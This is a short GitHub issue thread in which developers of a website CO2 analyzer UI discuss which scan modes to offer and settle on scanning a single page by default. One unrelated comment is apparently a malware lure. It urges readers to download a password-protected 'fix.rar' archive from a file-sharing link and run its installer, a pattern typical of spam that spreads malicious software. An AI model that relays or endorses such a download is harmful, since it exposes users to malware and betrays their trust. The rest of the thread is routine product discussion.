### ISSUE TITLE
Scan mode

### ISSUE THREAD

**Issue by anewmandev** [Root-Branch/cardamon-web-co2-analyzer-ui#2]
There are currently two scan modes
- Select (selected urls)
- Full (whole site, 3 levels deep limit) 

Note: the term 'Select Scan' is a little ambigious as it appears in dropdown suggesting they need to 'select a scan type'. 

I think, now we have reached this point of matiurity we should discuss scan modes, what we want to support etc 

Suggestion 
- Single Url 
- Multi-url (max 5 atm, 3 levels deep)
- Whole site report (available on request - we only run at green times?)

This is a UX discussion for @pbson @anewmandev @ohuu

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by anewmandev** [comment]
we decided to remove 'Select Scan' and always just scan the single page and then the main crawler UI is used to configure the users specific scan requests. 

this will be dealt with as part of below issue

https://github.com/Root-Branch/cardamon-web-co2-analyzer-ui/issues/7
